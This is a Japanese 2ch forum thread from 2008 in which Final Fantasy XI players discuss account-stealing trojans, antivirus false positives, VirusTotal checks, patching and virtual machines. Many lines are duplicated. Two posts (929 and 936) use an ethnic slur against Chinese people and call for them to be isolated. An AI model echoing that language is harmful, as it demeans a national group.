ttp://www.virustotal.com/jp/analisis/98bf5aa320406471158a980871cded82
こんなのがあったんですけど、8/5に更新されてるファイルで
C:\WINDOWS\ServicePackFiles\i386にあるってことは
WindowsUpdateのファイルかな?ってことは誤検出でOK?
こんなのがあったんですけど、8/5に更新されてるファイルで
C:\WINDOWS\ServicePackFiles\i386にあるってことは
WindowsUpdateのファイルかな?ってことは誤検出でOK?
919 :既にその名前は使われています:2008/08/12(火) 22:33:51 ID:NGS22e+2
920 :既にその名前は使われています:2008/08/12(火) 22:41:11 ID:NGS22e+2
というかうちの同名ファイル投げたらハッシュ一緒だった。誤検知。
CHMバラしてみたい人は参考までにどうぞ。
ttp://www.google.co.jp/search?hl=ja&q=%22hh.exe%22+%22-decompile%22
往年の「花の雫」がCHMにexeを仕込む手法を使ったことがある
(いまどきこの穴が残っているPCはほとんど無いと思われる)。
CHMバラしてみたい人は参考までにどうぞ。
ttp://www.google.co.jp/search?hl=ja&q=%22hh.exe%22+%22-decompile%22
往年の「花の雫」がCHMにexeを仕込む手法を使ったことがある
(いまどきこの穴が残っているPCはほとんど無いと思われる)。
921 :既にその名前は使われています:2008/08/12(火) 22:41:18 ID:6i/6tig2
>>918
1社だけだし、.chmだから誤検知だろう。
1社だけだし、.chmだから誤検知だろう。
922 :既にその名前は使われています:2008/08/12(火) 22:46:04 ID:/U4qZfce
923 :既にその名前は使われています:2008/08/12(火) 23:03:17 ID:7gi2i432
FlashPlayerやらちょっと気取った手法だけにに気を取られていると,アーカイブ偽装exeなんかにコロっと引っかかったりするから注意せねばなw
なにしろ俺がさっき胡散臭いメールで送られてきた奴にホイホイ引っかかってもうたわw
なにしろ俺がさっき胡散臭いメールで送られてきた奴にホイホイ引っかかってもうたわw
924 :既にその名前は使われています:2008/08/12(火) 23:11:24 ID:MxQbHCid
824です。
>>886
カスペルスキーしてみました。
C:\WINDOWS\SYSTEM32\smart.dll 感染: Trojan-GameThief.Win32.WOW.bht
これかぁぁ( ; ゚Д゚)
もうクレカとかやばそうだから再インスコしたほうがよさそうですね。カード
とめます・・
>>886
カスペルスキーしてみました。
C:\WINDOWS\SYSTEM32\smart.dll 感染: Trojan-GameThief.Win32.WOW.bht
これかぁぁ( ; ゚Д゚)
もうクレカとかやばそうだから再インスコしたほうがよさそうですね。カード
とめます・・
925 :既にその名前は使われています:2008/08/12(火) 23:18:40 ID:NGS22e+2
>>924
誤検知の例もあるからVirusTotalに投げて貼ってちょーだい
誤検知の例もあるからVirusTotalに投げて貼ってちょーだい
926 :既にその名前は使われています:2008/08/12(火) 23:29:21 ID:0yYcUu2r
windowerのフォーラムによれば
C:\WINDOWS\SYSTEM32\smart.dllは
FFXIAHやらsomepage.comが感染源らしい。
NoScriptやFlashBlock入れろ書いてあるからFlash経由くさいね。
C:\WINDOWS\SYSTEM32\smart.dllは
FFXIAHやらsomepage.comが感染源らしい。
NoScriptやFlashBlock入れろ書いてあるからFlash経由くさいね。
927 :既にその名前は使われています:2008/08/12(火) 23:58:04 ID:7gi2i432
>>924
VirusTotalはここねー.ここにそのdllそのものを送信すればおk.
http://www.virustotal.com/jp/
で,できれば対応状況が芳しくない場合にはウpロダにそのDllをうpしてほしいw
VirusTotalはここねー.ここにそのdllそのものを送信すればおk.
http://www.virustotal.com/jp/
で,できれば対応状況が芳しくない場合にはウpロダにそのDllをうpしてほしいw
928 :既にその名前は使われています:2008/08/13(水) 00:09:30 ID:5R2NMXn/
smart.dllって正規dllもあった気がするからなんとも言えないけどTrojan-GameThief.Win32.WOW.bhtで検出されてるしねえ.
本来どの位置にあるdllなんだっけ?
本来どの位置にあるdllなんだっけ?
929 :既にその名前は使われています:2008/08/13(水) 00:09:34 ID:H3MPT5aH
つうか、シナチク共を国際的に何とかしないと
ネット自体終了するよねこのままだと
気軽に家族でPC!なんてまじありえなくなってきた
ネット自体終了するよねこのままだと
気軽に家族でPC!なんてまじありえなくなってきた
930 :既にその名前は使われています:2008/08/13(水) 00:20:17 ID:eTPPv4uO
>>928
Windowsっていうか、システムにはありませんでした
Windowsっていうか、システムにはありませんでした
931 :既にその名前は使われています:2008/08/13(水) 01:15:19 ID:MapesBam
以前このスレで紹介したPC上に仮想PCを作成してLinuxをインストールする過程を
説明した動画のLinuxインストール編が完成してた。PC1台で仮想環境作ろうとして
る人は参考にしたらどうでしょう?
Linuxをいじろう 01 (準備編)
http://www.nicovideo.jp/watch/sm4038618
(New!)
Linuxをいじろう 02 (インストール編)
http://www.nicovideo.jp/watch/sm4244861
説明した動画のLinuxインストール編が完成してた。PC1台で仮想環境作ろうとして
る人は参考にしたらどうでしょう?
Linuxをいじろう 01 (準備編)
http://www.nicovideo.jp/watch/sm4038618
(New!)
Linuxをいじろう 02 (インストール編)
http://www.nicovideo.jp/watch/sm4244861
932 :既にその名前は使われています:2008/08/13(水) 01:23:12 ID:o0I6qj53
質問失礼します
カスペルスキーでスキャンした結果
not-a-virus:AdWare.Win32.Mostofate.eq
が検知されたんですがすごい危険なものなのでしょうか?
あまりPCには詳しくないものでご教授お願いします
カスペルスキーでスキャンした結果
not-a-virus:AdWare.Win32.Mostofate.eq
が検知されたんですがすごい危険なものなのでしょうか?
あまりPCには詳しくないものでご教授お願いします
933 :既にその名前は使われています:2008/08/13(水) 01:24:27 ID:e+GDJdUw
>>932
まずnot-a-virusを和訳してみ
まずnot-a-virusを和訳してみ
934 :既にその名前は使われています:2008/08/13(水) 01:26:08 ID:zJk+C6Id
>>932
その次はAdWareの和訳な!
その次はAdWareの和訳な!
935 :既にその名前は使われています:2008/08/13(水) 01:33:26 ID:o0I6qj53
936 :既にその名前は使われています:2008/08/13(水) 01:47:33 ID:IL6TdfE+
>>929
ほんとだよなー 全世界的に奴等隔離でいいよもうw
ほんとだよなー 全世界的に奴等隔離でいいよもうw
937 :既にその名前は使われています:2008/08/13(水) 05:01:24 ID:MLXAPbu9
>>931
ニコニコは見れないんだけど、紹介を見るにVirtualBox+Vineか。
自分はVirtualBox+1CD Linuxも結構初心者向きかと思う。
VirtualBoxをインストして、1CD Linuxのイメージをマウントすればインストの必要なく
即効でNet閲覧環境は完成する。仮想PC上とはいえインストは結構かったるいから、
楽をしたい人やどうしても急いで安全な環境を求めたい人には向いていると思う。
無難なのを選ぶならKNOPPIXか。
とはいえ、UbuntuあたりはVirtualBox用の仮想ハードディスクイメージの配布ってのも
あるんで実はこれが一番楽かもしんない。
ニコニコは見れないんだけど、紹介を見るにVirtualBox+Vineか。
自分はVirtualBox+1CD Linuxも結構初心者向きかと思う。
VirtualBoxをインストして、1CD Linuxのイメージをマウントすればインストの必要なく
即効でNet閲覧環境は完成する。仮想PC上とはいえインストは結構かったるいから、
楽をしたい人やどうしても急いで安全な環境を求めたい人には向いていると思う。
無難なのを選ぶならKNOPPIXか。
とはいえ、UbuntuあたりはVirtualBox用の仮想ハードディスクイメージの配布ってのも
あるんで実はこれが一番楽かもしんない。
938 :既にその名前は使われています:2008/08/13(水) 05:32:11 ID:o7Vt0kax
939 :既にその名前は使われています:2008/08/13(水) 08:21:01 ID:h2eOHzit
Windows XP Update アゲ
940 :既にその名前は使われています:2008/08/13(水) 08:36:03 ID:xVFV/6oL
2008 年 8 月のセキュリティ情報
http://www.microsoft.com/japan/technet/security/bulletin/ms08-Aug.mspx
http://www.microsoft.com/japan/technet/security/bulletin/ms08-Aug.mspx
941 :既にその名前は使われています:2008/08/13(水) 08:36:07 ID:6puEHWWP
>>939
仮想環境自体は、PC操作にある程度なれてれば特別難しくは無いよ。
ちょっとだけドライブの割り当てがどうとか、メモリーがどうとか、音源最初はオフの可能性あるのでどうするかとか、
あるにはあるけど、マニュアルなり本もでわまってるしな。
設定いじらなくても普通に使えるけど、メモリー割り当ては見直さないと少なすぎる可能性はあるかな。
それよりリナックス自体のほうが100倍めんどいわ。
それも最近はインストール一発で簡単に使えるパッケージ多いから、
説明みながらやればそうそう詰まることも無いと思う。
リナックスが合わないならWindows入れてもいいしな。ライセンス別に必要になるけど。
仮想環境自体は、PC操作にある程度なれてれば特別難しくは無いよ。
ちょっとだけドライブの割り当てがどうとか、メモリーがどうとか、音源最初はオフの可能性あるのでどうするかとか、
あるにはあるけど、マニュアルなり本もでわまってるしな。
設定いじらなくても普通に使えるけど、メモリー割り当ては見直さないと少なすぎる可能性はあるかな。
それよりリナックス自体のほうが100倍めんどいわ。
それも最近はインストール一発で簡単に使えるパッケージ多いから、
説明みながらやればそうそう詰まることも無いと思う。
リナックスが合わないならWindows入れてもいいしな。ライセンス別に必要になるけど。
942 :既にその名前は使われています:2008/08/13(水) 08:37:23 ID:6puEHWWP
943 :既にその名前は使われています:2008/08/13(水) 09:03:57 ID:IEUjtBBV
火葬PCってのはつまり
自分の今動いてるウィンXPが動いているときに仮想PCソフトをインストールして
その仮想PCソフトの中で新しく買ってきたウィンドウズを動かすってこと?
自分の今動いてるウィンXPが動いているときに仮想PCソフトをインストールして
その仮想PCソフトの中で新しく買ってきたウィンドウズを動かすってこと?
944 :既にその名前は使われています:2008/08/13(水) 09:07:32 ID:xs0IX++X
カスペでwzcsvbxm.dll削除したんだけどクリーンインスコしなくても大丈夫?
945 :既にその名前は使われています:2008/08/13(水) 09:08:13 ID:q8jhh2Gh
したほうがいいお
946 :既にその名前は使われています:2008/08/13(水) 09:30:49 ID:6puEHWWP
>>943
そのとおり。
仮想PCってのは、今動いてるWindows上に、PCそのもののハードを、ソフトを使って無理やり再現してる。
エミュレータってやつね。
仮想的なPC本体そのものだから、WindowsだろうがリナックスだろうがMS−DOSだろうが何でも動く。
一部制限が有る場合もあるが。
そのとおり。
仮想PCってのは、今動いてるWindows上に、PCそのもののハードを、ソフトを使って無理やり再現してる。
エミュレータってやつね。
仮想的なPC本体そのものだから、WindowsだろうがリナックスだろうがMS−DOSだろうが何でも動く。
一部制限が有る場合もあるが。
947 :既にその名前は使われています:2008/08/13(水) 09:37:50 ID:h03LP505
virtualPCとVirtual Boxってどっちがいいのかね?
どうせブラウザとメールくらいしか試さないから軽めがいいのよね
まぁスレ違いですまんが
どうせブラウザとメールくらいしか試さないから軽めがいいのよね
まぁスレ違いですまんが
948 :既にその名前は使われています:2008/08/13(水) 09:41:39 ID:puOQghPM
949 :既にその名前は使われています:2008/08/13(水) 09:50:26 ID:+8ozkD6E
カスペルスキーのオンラインスキャンはIE限定ですか?
Firefoxだと承認と拒否の所で承認を押しても何も始まらないんですが
Firefoxだと承認と拒否の所で承認を押しても何も始まらないんですが
950 :既にその名前は使われています:2008/08/13(水) 09:52:09 ID:u3TiNuWO
951 :既にその名前は使われています:2008/08/13(水) 09:53:50 ID:+8ozkD6E
952 :既にその名前は使われています:2008/08/13(水) 09:57:30 ID:aCcD2ZT/
953 :既にその名前は使われています:2008/08/13(水) 10:01:54 ID:+8ozkD6E
954 :既にその名前は使われています:2008/08/13(水) 10:05:17 ID:aCcD2ZT/
955 :既にその名前は使われています:2008/08/13(水) 10:24:08 ID:zJk+C6Id
IE Tabを入れておけばFireFoxでも動作するけど、まあどうでもいいか。
956 :既にその名前は使われています:2008/08/13(水) 10:30:24 ID:tqOcCmli
IETabは重いからなー。
957 :既にその名前は使われています:2008/08/13(水) 10:53:18 ID:puOQghPM
今日は何人待ち?
958 :既にその名前は使われています:2008/08/13(水) 10:57:40 ID:uPqebfMx
959 :既にその名前は使われています:2008/08/13(水) 11:14:29 ID:6P+GX4fF
もはや、FF専用PCとweb閲覧用PCと2台用意しないとダメだな
960 :既にその名前は使われています:2008/08/13(水) 11:30:55 ID:nnNsOLpx
>>959
携帯だけか小型の閲覧専用PCだけかで考えないともう無理だ
踏んでしまったが最後金銭面を含めて時間的な被害を問答無用で受ける
鯖が信用できない状態でクライアントができることは限られるし
正直手の打ちようがない
携帯だけか小型の閲覧専用PCだけかで考えないともう無理だ
踏んでしまったが最後金銭面を含めて時間的な被害を問答無用で受ける
鯖が信用できない状態でクライアントができることは限られるし
正直手の打ちようがない
961 :既にその名前は使われています:2008/08/13(水) 11:35:13 ID:IEUjtBBV
>>957
3人くらいしかいない今がチャンス
3人くらいしかいない今がチャンス
962 :既にその名前は使われています:2008/08/13(水) 11:52:42 ID:JdfWwISV
FF専用PC+Macのオレに隙はなかった。
PCも対策してるけどそれでも心配なんだよね・・・
毎日ログアウトした後でPS2でパス変更してるわ。
PCも対策してるけどそれでも心配なんだよね・・・
毎日ログアウトした後でPS2でパス変更してるわ。
963 :既にその名前は使われています:2008/08/13(水) 11:59:43 ID:9LQiu/Qk
>>962
そしてAtok fo rMACに付属していたUSBメモリー経由で感染してしまうんですね、分かります。
そしてAtok fo rMACに付属していたUSBメモリー経由で感染してしまうんですね、分かります。
964 :既にその名前は使われています:2008/08/13(水) 12:05:29 ID:K3CECdBf
XREAの新型、昨夜更新。今回はリネージュ2のパス抜きの模様。
ttp://www.virustotal.com/analisis/e03e26a5993402b293ba3d3e8609a8c0
>>948
>>717 >>725
ttp://www.virustotal.com/analisis/e03e26a5993402b293ba3d3e8609a8c0
>>948
>>717 >>725
965 :既にその名前は使われています:2008/08/13(水) 12:26:08 ID:v8dkiEJN
最近XREAっちゅうのがウィルスのタイプ名に見えてきた
もう事業停止でいいよw
もう事業停止でいいよw
966 :既にその名前は使われています:2008/08/13(水) 13:06:51 ID:G9Cd433N
>>965
俺もw
俺もw
967 :既にその名前は使われています:2008/08/13(水) 13:15:35 ID:nG58XW3+
マイクロソフト、8月の月例パッチ11件を公開
IEやOffice関連の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/08/13/20572.html
古いOfficeはMicrosoftUpdateでは出来ないので忘れずにOffice Updateのページに行ってやりましょう
IEやOffice関連の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/08/13/20572.html
古いOfficeはMicrosoftUpdateでは出来ないので忘れずにOffice Updateのページに行ってやりましょう
968 :既にその名前は使われています:2008/08/13(水) 13:22:44 ID:hDl0Ae0x
Officeなんて自作PCに入れる奴いるのか
969 :既にその名前は使われています:2008/08/13(水) 14:00:02 ID:K3CECdBf
Viewerだけ入れてる人は多いかも
970 :既にその名前は使われています:2008/08/13(水) 15:09:42 ID:824i0OEZ
IPAセキュリティセンターおよび有限責任中間法人
JPCERTコーディネーションセンター(JPCERT/CC)は12日、
「『ウイルスセキュリティ』および『ウイルスセキュリティZERO』における
サービス運用妨害 (DoS) の脆弱性」を公表した。IPAセキュリティセンターは、
本件を「注意喚起」としている。ソースネクストが販売する
ウイルス対策ソフト「ウイルスセキュリティ」、
「ウイルスセキュリティZERO」に発見された脆弱性は以下の通り。
ファイルスキャン処理において圧縮ファイルの取り扱いに問題があり、
サービス運用妨害(DoS)状態となるセキュリティ上の脆弱性が存在する。
この脆弱性が悪用されると、「ウイルスセキュリティ」および
「ウイルスセキュリティZERO」のファイルスキャン処理が停止し、
以降ウイルスが検知できなくなる。
対策としては、ソースネクストより提供されるバージョンアップを
速やかに行うこととしている。
*+*+ マイコミジャーナル 2008/08/12[**:**] +*+*
http://journal.mycom.co.jp/news/2008/08/12/039/index.html
JPCERTコーディネーションセンター(JPCERT/CC)は12日、
「『ウイルスセキュリティ』および『ウイルスセキュリティZERO』における
サービス運用妨害 (DoS) の脆弱性」を公表した。IPAセキュリティセンターは、
本件を「注意喚起」としている。ソースネクストが販売する
ウイルス対策ソフト「ウイルスセキュリティ」、
「ウイルスセキュリティZERO」に発見された脆弱性は以下の通り。
ファイルスキャン処理において圧縮ファイルの取り扱いに問題があり、
サービス運用妨害(DoS)状態となるセキュリティ上の脆弱性が存在する。
この脆弱性が悪用されると、「ウイルスセキュリティ」および
「ウイルスセキュリティZERO」のファイルスキャン処理が停止し、
以降ウイルスが検知できなくなる。
対策としては、ソースネクストより提供されるバージョンアップを
速やかに行うこととしている。
*+*+ マイコミジャーナル 2008/08/12[**:**] +*+*
http://journal.mycom.co.jp/news/2008/08/12/039/index.html
971 :既にその名前は使われています:2008/08/13(水) 17:07:07 ID:hDANwYFp
XREAでウィルスを拾うのもFlashPlayerの脆弱性が原因でしたっけ
どこかにレスがあった記憶なのですけど見つけられない・・・
どこかにレスがあった記憶なのですけど見つけられない・・・
972 :既にその名前は使われています:2008/08/13(水) 17:20:37 ID:OvTfPBeZ
フラッシュの更新してなくてハックされた。
その後フラッシュプレイヤーを最新にし、
最新のノートン先生でスキャンをかけてみるも、何もウィルスっぽいものはみつからず。
トラッキングクッキーは一応全部削除したんだが、この状態で巻き戻し処理しても
大丈夫だと思う?
その後フラッシュプレイヤーを最新にし、
最新のノートン先生でスキャンをかけてみるも、何もウィルスっぽいものはみつからず。
トラッキングクッキーは一応全部削除したんだが、この状態で巻き戻し処理しても
大丈夫だと思う?
973 :既にその名前は使われています:2008/08/13(水) 17:21:53 ID:6P+GX4fF
もうXREAとかFC2とか見ないようにしたほうがいい
974 :既にその名前は使われています:2008/08/13(水) 17:23:26 ID:e+GDJdUw
975 :既にその名前は使われています:2008/08/13(水) 17:24:38 ID:QIGeDJw1
どうせ巻き戻しに時間かかるんだから
今のうちにクリーンインストールしろ
今のうちにクリーンインストールしろ
976 :既にその名前は使われています:2008/08/13(水) 17:25:02 ID:OvTfPBeZ
うーむそうか。 迅速レスありがとう。
やってみます。
やってみます。
977 :既にその名前は使われています:2008/08/13(水) 17:27:25 ID:71HZBy2R
>>973
火狐に581を入れると、踏んだURLにXREAが含まれてた時はいいかもな
火狐に581を入れると、踏んだURLにXREAが含まれてた時はいいかもな
978 :既にその名前は使われています:2008/08/13(水) 17:42:29 ID:G9Cd433N
今回のXREAは無料有料鯖関係ないっぽいのかな?
979 :既にその名前は使われています:2008/08/13(水) 18:09:16 ID:3kFkV7ym
980 :既にその名前は使われています:2008/08/13(水) 18:11:27 ID:YxZvBUfX
FC2って一度対策施されてから、改ざん被害ってあったっけ?
981 :既にその名前は使われています:2008/08/13(水) 18:20:47 ID:qKCyMxq5
982 :既にその名前は使われています:2008/08/13(水) 18:26:42 ID:uPqebfMx
すれたてちゃれんじしてくる
983 :既にその名前は使われています:2008/08/13(水) 18:28:40 ID:uPqebfMx
だめだった ダレカタノムorz
984 :既にその名前は使われています:2008/08/13(水) 18:47:20 ID:hDANwYFp
立ててきます
985 :既にその名前は使われています:2008/08/13(水) 18:47:20 ID:aDXaMAwm
>>979
指摘しても分かってないから仕方ないな
指摘しても分かってないから仕方ないな
986 :既にその名前は使われています:2008/08/13(水) 18:50:21 ID:hDANwYFp
●● RMT業者の垢ハックが多発している件36 ●●
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
前スレ ●● RMT業者の垢ハックが多発している件35 ●● http://changi.2ch.net/test/read.cgi/ogame/1217834363/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
前スレ ●● RMT業者の垢ハックが多発している件35 ●● http://changi.2ch.net/test/read.cgi/ogame/1217834363/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
987 :既にその名前は使われています:2008/08/13(水) 18:51:16 ID:hDANwYFp
わたしもだめでした
↑テンプレ雛形です、どなたかお願いしますm(_ _)m
↑テンプレ雛形です、どなたかお願いしますm(_ _)m
988 :既にその名前は使われています:2008/08/13(水) 18:58:16 ID:MgMLTT4Y
>>986
たてました。テンプレよくわからないので、必要なら貼ってね。
●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/
たてました。テンプレよくわからないので、必要なら貼ってね。
●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/
989 :既にその名前は使われています:2008/08/13(水) 19:05:15 ID:tKY7tQ/V
ochu!
990 :既にその名前は使われています:2008/08/13(水) 19:10:09 ID:oSdy9GCf
991 :既にその名前は使われています:2008/08/13(水) 19:14:03 ID:/ZuZV7yr
>>990
それ垢ハックの件じゃねーから
それ垢ハックの件じゃねーから
992 :既にその名前は使われています:2008/08/13(水) 19:18:21 ID:e+GDJdUw
PG2の起動時のロゴ変わった?
今PC立ち上げて謎のロゴが出てびびったわー
今PC立ち上げて謎のロゴが出てびびったわー
993 :既にその名前は使われています:2008/08/13(水) 19:26:17 ID:tKY7tQ/V
みなさんWindowsUpdateですよー
994 :既にその名前は使われています:2008/08/13(水) 19:27:35 ID:evm7VLg3
995 :既にその名前は使われています:2008/08/13(水) 19:27:58 ID:5hdwDHgd
>>991
?????????????????????
?????????????????????
996 :既にその名前は使われています:2008/08/13(水) 20:28:41 ID:wxF3nuFw
今のXERAのはどこから進入?
FP更新とウィンドウズアップデートしとけば大丈夫?
FP更新とウィンドウズアップデートしとけば大丈夫?
997 :既にその名前は使われています:2008/08/13(水) 20:39:37 ID:hDANwYFp
998 :既にその名前は使われています:2008/08/13(水) 20:40:55 ID:+yDEIZqS
999 :既にその名前は使われています:2008/08/13(水) 20:42:24 ID:wxF3nuFw
情報ありがとうございます
とりあえずjavaは不許可&PG2&カスペなので安心
アンテナは常に張っておくようにします
●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/
とりあえずjavaは不許可&PG2&カスペなので安心
アンテナは常に張っておくようにします
●● RMT業者の垢ハックが多発している件36 ●●
http://changi.2ch.net/test/read.cgi/ogame/1218621315/
1000 :既にその名前は使われています:2008/08/13(水) 20:47:19 ID:hDANwYFp
1000げっつ埋め
1001 :1001:
=== Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===
//
/ .人 あ、ぽこたんインできないお!
/ (__) パカ
/ ∩(____) このスレッドは1000を超えたお。。。
/ .|( ・∀・)_ もう書けないので、新しいスレッドにインするお!
// | ヽ/
" ̄ ̄ ̄"∪
//
/ .人 あ、ぽこたんインできないお!
/ (__) パカ
/ ∩(____) このスレッドは1000を超えたお。。。
/ .|( ・∀・)_ もう書けないので、新しいスレッドにインするお!
// | ヽ/
" ̄ ̄ ̄"∪